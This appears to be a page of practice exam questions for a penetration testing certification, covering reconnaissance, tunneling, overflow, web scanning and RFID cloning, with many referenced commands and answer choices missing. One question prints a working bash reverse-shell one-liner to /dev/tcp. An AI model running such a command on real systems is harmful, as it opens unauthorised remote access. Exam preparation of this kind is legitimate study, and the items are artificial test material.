The latest changes and updates from the administration for this exam.
Latest Update: Jun 15 2026
All questions are working fine.
Moraine is using the proxychains tool to help disguise her true IP address from her targets. She wants to input a command into the CLI to display her masked public-facing IP address as assigned by the network chain. Which command would she most likely input to find this result?
During a web application test, you execute the following command to identify hidden resources:
The results include previously unknown backup and configuration files. Which of the following techniques have you performed?
You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?
You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you received the following warning:
"The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved."
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
Based on your analysis, which of the following actions should you take?
During a web application assessment, you identify multiple vulnerabilities, including reflected Cross-Site Scripting (XSS), error-based Structured Query Language injection (SQLi), and malformed Extensible Markup Language (XML) payload manipulation. In each case, the application accepts user-supplied data from forms and URL parameters without properly sanitizing or validating the input before processing it on the server. Which underlying security weakness is MOST likely responsible for enabling all of these attack types?
During a network penetration test, a tester identifies a host running an HTTP (Hypertext Transfer Protocol) service on TCP (Transmission Control Protocol) port 80. The tester wants to validate whether the service is vulnerable to known issues without manually interacting with the application and prefers an automated, targeted approach that leverages built-in functionality of an existing reconnaissance tool. Which of the following approaches would BEST accomplish this objective?
A penetration tester just entered the following command into a Bash shell on target server:
-=-=-=-=-=-
bash 1>& /dev/tcp/192.168.1.53/31337 0>&1
-=-=-=-=-=-
Before the penetration tester runs that command, what must they run first on their machine?
Hugh, another penetration tester, has compromised a web server in a segmented network. To move laterally, he needs to route his traffic through the compromised machine to access a database server located in another network segment. Hugh plans to use SSH tunneling to achieve this. Which of the following commands could Hugh run to establish a relay through the compromised web server and access the database server?
During a physical penetration test, Evie observes an employee scanning their RFID badge to access a restricted area. Using a small handheld device, she captures the signal from the badge and later replicates it onto a blank RFID card. What technique is Evie using to gain unauthorized access?
During an OSINT phase, you want to map relationships between domains, IP addresses, email addresses, and organizations in a visual format to identify potential attack paths. Which of the following tools would BEST support this type of analysis?
